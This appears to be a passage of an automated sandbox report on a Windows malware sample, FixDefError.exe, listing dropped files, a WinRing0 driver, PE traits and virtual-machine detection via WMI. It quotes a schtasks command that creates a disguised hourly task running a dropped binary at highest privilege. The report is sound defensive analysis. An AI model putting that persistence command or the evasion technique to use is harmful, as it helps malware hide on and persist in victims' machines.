      Source: FixDefError.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
      Source: FixDefError.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x247800
      Source: FixDefError.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: FixDefError.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: ImpulseWatch.pdb source: ProgramStarter.exe, 00000001.00000002.328304357.0000000004933000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe.1.dr
      Source: Binary string: ImpulseWatch.pdb|l source: ProgramStarter.exe, 00000001.00000002.328304357.0000000004933000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe.1.dr
      Source: Binary string: ProgramInstaller.pdb source: FixDefError.exe
      Source: Binary string: Impulse.pdb source: FixDefError.exe, 00000000.00000002.302610547.0000000005B07000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000000.249150208.0000000000752000.00000002.00000001.01000000.00000007.sdmp, ProgramStarter.exe.0.dr
      Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.1.dr
      Source: Binary string: ImpulseClipper.pdb source: ProgramStarter.exe, 00000001.00000002.328304357.0000000004AB9000.00000004.00000800.00020000.00000000.sdmp, RegSvc.exe, 00000038.00000000.287793640.00000000001B2000.00000002.00000001.01000000.00000009.sdmp, RegSvc.exe.1.dr
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_084E7050 pushfd ; retf
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_09DE4C09 push dword ptr [edx+ebp*2-75h]; iretd
      Source: svhost.exe.1.drStatic PE information: section name: .xdata
      Source: FixDefError.exeStatic PE information: 0xDBB16EC1 [Sat Oct 19 04:02:09 2086 UTC]
      Source: initial sampleStatic PE information: section name: .text entropy: 7.759171527144073

      Persistence and Installation Behavior

      barindex
      Sample is not signed and drops a device driver
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeFile created: C:\ProgramData\RuntimeBrokerData\WinRing0x64.sysJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeFile created: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeFile created: C:\ProgramData\RuntimeBrokerData\RegSvc.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeFile created: C:\ProgramData\RuntimeBrokerData\WinRing0x64.sysJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeFile created: C:\ProgramData\RuntimeBrokerData\svhost.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeFile created: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exeJump to dropped file
      Source: C:\Users\user\Desktop\FixDefError.exeFile created: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeFile created: C:\ProgramData\RuntimeBrokerData\RegSvc.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeFile created: C:\ProgramData\RuntimeBrokerData\WinRing0x64.sysJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeFile created: C:\ProgramData\RuntimeBrokerData\svhost.exeJump to dropped file

      Boot Survival

      barindex
      Uses schtasks.exe or at.exe to add and modify task schedules
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\FixDefError.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeProcess information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      barindex
      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
